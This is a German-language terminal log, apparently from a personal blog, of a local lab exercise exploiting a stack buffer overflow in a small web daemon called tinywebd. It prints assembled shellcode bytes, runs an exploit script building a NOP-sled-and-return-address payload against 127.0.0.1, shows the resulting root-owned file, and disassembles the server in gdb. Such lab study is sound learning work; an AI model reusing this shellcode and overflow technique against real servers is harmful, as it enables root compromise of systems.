root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm mark.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C mark
00000000  eb 1d 5b 31 c9 88 4b 07  6a 05 58 66 b9 41 04 31  |..[1..K.j.Xf.A.1|
00000010  d2 66 ba 80 01 cd 80 89  c3 6a 06 58 cd 80 cc e8  |.f.......j.X....|
00000020  de ff ff ff 2f 48 61 63  6b 65 64 58              |..../HackedX|
0000002c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# mkd
mkdir        mkdiskimage  mkdosfs     
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
ls: Zugriff auf /Hacked nicht möglich: Datei oder Verzeichnis nicht gefunden
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_stealth.sh mark 127.0.0.1
target IP: 127.0.0.1
shellcode: mark (44 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (341 b)] [shellcode (44 b)] [ret addr (128 b)]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
-rw------- 1 root root 0 Sep 11 18:35 /Hacked

Das hat ja wunderbar geklappt.

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
(gdb) disass main
Dump of assembler code for function main:
   0x08048d47 <+0>: push   %ebp
…... viel Material, leider habe ich den Nop nicht gefunden, ist aber nicht schlimm....
   0x08048f73 <+556>: jmp    0x8048f1a <main+467>
End of assembler dump.
(gdb) disass handle_connection
Dump of assembler code for function handle_connection:
   0x08048f75 <+0>: push   %ebp
   0x08048f76 <+1>: mov    %esp,%ebp
   0x08048f78 <+3>: push   %edi
   0x08048f79 <+4>: push   %ebx
   0x08048f7a <+5>: sub    $0x620,%esp
   0x08048f80 <+11>: lea    -0x208(%ebp),%eax
   0x08048f86 <+17>: mov    %eax,0x4(%esp)
   0x08048f8a <+21>: mov    0x8(%ebp),%eax
   0x08048f8d <+24>: mov    %eax,(%esp)
   0x08048f90 <+27>: call   0x8048c68 <recv_line>
   0x08048f95 <+32>: mov    %eax,-0x10(%ebp)
   0x08048f98 <+35>: mov    0xc(%ebp),%eax
   0x08048f9b <+38>: movzwl 0x2(%eax),%eax
   0x08048f9f <+42>: movzwl %ax,%eax
   0x08048fa2 <+45>: mov    %eax,(%esp)
   0x08048fa5 <+48>: call   0x8048900 <ntohs@plt>

   0x080493a4 <+1071>: movl   $0x2,0x4(%esp)
   0x080493ac <+1079>: mov    0x8(%ebp),%eax
   0x080493af <+1082>: mov    %eax,(%esp)
   0x080493b2 <+1085>: call   0x8048940 <shutdown@plt>
   0x080493b7 <+1090>: add    $0x620,%esp
   0x080493bd <+1096>: pop    %ebx
   0x080493be <+1097>: pop    %edi
   0x080493bf <+1098>: pop    %ebp
   0x080493c0 <+1099>: ret   
End of assembler dump.
(gdb) ^CQuit
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

   

Websicherheit...  

   
© ALLROUNDER